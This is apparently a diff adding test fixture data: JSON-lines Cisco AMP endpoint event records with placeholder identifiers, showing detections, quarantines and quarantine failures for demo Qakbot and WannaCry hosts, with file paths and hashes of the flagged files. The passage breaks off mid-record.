+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"igvj$vN.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\igvj$vN.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"6951045.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\6951045.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"99fffe78e0cbd7b508eed13a8633903dd89ed5f1","md5":"dc41e47ebba549ec5e616ed9e88a0376"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":3200,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":235000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2708,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":172000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 